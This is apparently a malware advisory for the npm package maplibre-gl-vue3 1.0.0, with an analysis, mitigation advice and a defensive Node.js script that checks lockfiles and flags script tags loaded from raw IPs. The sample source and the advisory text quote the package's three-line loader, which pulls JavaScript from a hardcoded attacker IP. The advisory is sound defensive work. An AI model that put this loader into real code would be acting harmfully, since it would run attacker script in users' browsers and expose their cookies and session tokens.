MAL-2026-6592: Malicious code in maplibre-gl-vue3 (npm)
The npm package maplibre-gl-vue3 version 1.0.0 contains malicious code that injects a script tag into the document head, loading attacker-controlled JavaScript from an unencrypted, hardcoded IP address. This script can access sensitive browser data such as cookies, localStorage, session tokens, and user input in any Vue 3 application that imports this package. The package name closely resembles legitimate Vue bindings for MapLibre GL, increasing the risk of accidental installation.
AI Analysis
Technical Summary
The maplibre-gl-vue3 npm package (version 1.0.0) advertises itself as Vue 3 bindings for MapLibre GL but includes malicious behavior by unconditionally injecting a <script> tag pointing to a hardcoded HTTP endpoint (http://121.199.166.250:19527/myApi/pipesnetwork.js) into the document head upon import. This endpoint serves attacker-controlled JavaScript, enabling full access to browser-stored sensitive data within the host application. The script loader is unpinned, served over plaintext HTTP, and unrelated to the package's stated mapping functionality. A source comment suggests the script URL was intended to be replaced before release, indicating this is likely a supply chain compromise. The package name shadows the legitimate vue-maplibre-gl package, increasing the likelihood of accidental usage.
Potential Impact
Any Vue 3 application importing maplibre-gl-vue3 version 1.0.0 will execute attacker-controlled JavaScript in the browser context, potentially exposing cookies, localStorage, session tokens, and user input to the attacker. This compromises user data confidentiality and application integrity. The use of an unencrypted HTTP endpoint allows for interception and modification of the malicious script in transit.
Mitigation Recommendations
No official patch or remediation is currently available for maplibre-gl-vue3 version 1.0.0. Users should avoid installing or using this package. Instead, use the legitimate vue-maplibre-gl package for Vue 3 bindings to MapLibre GL. Monitor vendor advisories for updates or official fixes. Since this is a malicious package, removing it from projects and dependency trees is critical.
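As an added example (not code from the advisory or from either package), the following Node.js snippet implements two defender-side checks drawn from the analysis above: locating maplibre-gl-vue3@1.0.0 in an npm lockfile, and flagging package source that injects a <script> loaded over plaintext HTTP from a raw IP address into document.head. It assumes the npm lockfile v2/v3 "packages" map layout; the sample lockfile and sample source are constructed.

```javascript
// Added example (not from the advisory or the package): defender-side checks for
// MAL-2026-6592. findAffected() looks up the affected package in a lockfile's
// "packages" map (npm lockfile v2/v3 layout); findPlaintextIpLoaders() flags
// source that injects a <script> loaded over http:// from a raw IPv4 host, the
// behaviour the advisory describes. Sample lockfile and source are constructed.

const AFFECTED = { name: 'maplibre-gl-vue3', versions: ['1.0.0'] };

// Walk lockfile "packages" entries (keys like "node_modules/<name>", nested
// installs allowed) and return every path that installs an affected version.
function findAffected(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    const name = path.split('node_modules/').pop();
    if (name === AFFECTED.name && AFFECTED.versions.includes(meta.version)) {
      hits.push({ path, version: meta.version });
    }
  }
  return hits;
}

// Heuristic: a script element whose src is an http:// URL with a raw IPv4 host,
// in a file that also appends a node to document.head. Returns the matched URLs.
const SCRIPT_SRC_RE = /\.src\s*=\s*['"`](http:\/\/(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?\/[^'"`]*)['"`]/g;
function findPlaintextIpLoaders(source) {
  const injects = /document\.head\.appendChild\s*\(/.test(source);
  if (!injects) return [];
  return [...source.matchAll(SCRIPT_SRC_RE)].map((m) => m[1]);
}

// Constructed sample lockfile: the legitimate package plus one affected install.
const SAMPLE_LOCK = {
  packages: {
    'node_modules/vue-maplibre-gl': { version: '4.0.0' },
    'node_modules/maplibre-gl-vue3': { version: '1.0.0' },
  },
};

// Constructed sample source reproducing the loader pattern the advisory describes.
const SAMPLE_SOURCE = `
const s = document.createElement('script');
s.src = 'http://121.199.166.250:19527/myApi/pipesnetwork.js';
document.head.appendChild(s);
`;

console.log(findAffected(SAMPLE_LOCK));
console.log(findPlaintextIpLoaders(SAMPLE_SOURCE));
```

To run against a real project, replace SAMPLE_LOCK with JSON.parse of the project's package-lock.json and SAMPLE_SOURCE with the contents of each installed package's entry file.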
Technical Details
- GCVE Source: db.gcve.eu
- OSV ID: MAL-2026-6592
- OSV Schema Version: 1.7.4
- Aliases: []
- Ecosystems: ["npm"]
- Database Specific Severity: null
- CVSS Version: null
Threat ID: 6a42ed6527e9c79719937db9
Added to database: 06/29/2026, 22:10:45 UTC
Last enriched: 06/29/2026, 22:34:08 UTC
Last updated: 06/30/2026, 00:43:41 UTC